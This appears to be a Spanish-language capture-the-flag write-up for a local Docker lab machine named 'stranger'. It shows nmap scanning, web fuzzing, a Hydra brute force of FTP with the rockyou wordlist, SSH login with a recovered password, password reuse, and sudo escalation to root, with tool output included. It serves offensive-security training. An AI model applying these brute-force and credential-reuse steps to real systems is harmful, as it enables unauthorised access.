Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipstranger.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shstranger.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap-p---open-sS--min-rate5000-vvv-n-Pn<IP>
nmap-sCV-p<PORTS><IP>
Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 05:04 EST
Nmap scan report for insanity.dl (172.17.0.2)
Host is up (0.000040s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6:af:01:77:e8:fc:a4:95:85:6b:5c:9c:c7:c1:d3:98 (ECDSA)
|_ 256 36:7e:d3:25:fa:59:38:8f:2e:21:f9:f0:28:a4:7e:44 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: welcome
|_http-server-header: Apache/2.4.58 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: my; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.10 seconds
Si entramos en la pagina solo veremos este mensaje, que por lo que parece es un nombre de usuario que nos guardaremos:
Welcome mwheeler!!
Vamos a realizar un poco de fuzzing a ver que encontramos.
Vemos 2 cosas interesantes una de ellas llamada /private.txt y la otra /secret.html.
Si nos descargamos el private.txt veremos que si lo leemos estara encriptado, por lo que tendremos que desencriptarlo, pero lo dejaremos para mas tarde.
Si entramos al secret.html veremos lo siguiente:
The ftp user is admin, but the password is ...
You must discover it.
A hint: The rockyou diccionary is correct for use!
Aqui vemos que podremos utilizar fuerza bruta con el usuario admin con el diccionario rockyou.txt sobre el FTP.
FTP
hydra-ladmin-P<WORDLIST>ftp://<IP>-t64-I
Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-23 05:30:06
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://172.17.0.2:21/
[21][ftp] host: 172.17.0.2 login: admin password: banana
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 14 final worker threads did not complete until end.
[ERROR] 14 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-23 05:30:29
Vemos que conseguimos las credenciales, por lo que nos conectaremos a dicho puerto de la siguiente forma:
ftpadmin@<IP>
Metemos como contraseña banana y veremos que estamos dentro.
Si listamos los archivos veremos lo siguiente:
ftp> ls
229 Entering Extended Passive Mode (|||40004|)
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 522 May 01 2024 private_key.pem
226 Directory send OK.
Por lo que nos descargaremos el siguiente archivo.
Echo esto se nos generara el archivo decrypted.txt y si lo leemos veremos lo siguiente:
demogorgon
Por lo que vemos obtener una contraseña que posiblemente puede ser del primero usuario que vimos anteriormente en la primera pagina llamado mwheeler, por lo que probaremos lo siguiente:
SSH
sshmwheeler@<IP>
Metemos como contraseña demogorgon y veremos que estamos dentro.
Escalate user admin
Si listamos los usuarios que hay en el sistema veremos lo siguiente:
Vemos que esta el usuario admin por lo que veremos a probar a reutilizar la contraseña que encontramos en el FTP.
suadmin
Metemos como contraseña banana y veremos que somos dicho usuario.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for admin on 9de778984302:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User admin may run the following commands on 9de778984302:
(ALL) ALL
Vemos que podemos ejecutar cualquier cosas como el usuario root, por lo que haremos lo siguiente:
sudosu
Y con esto veremos que somos root, por lo que habremos terminado la maquina y leeremos la flag de root.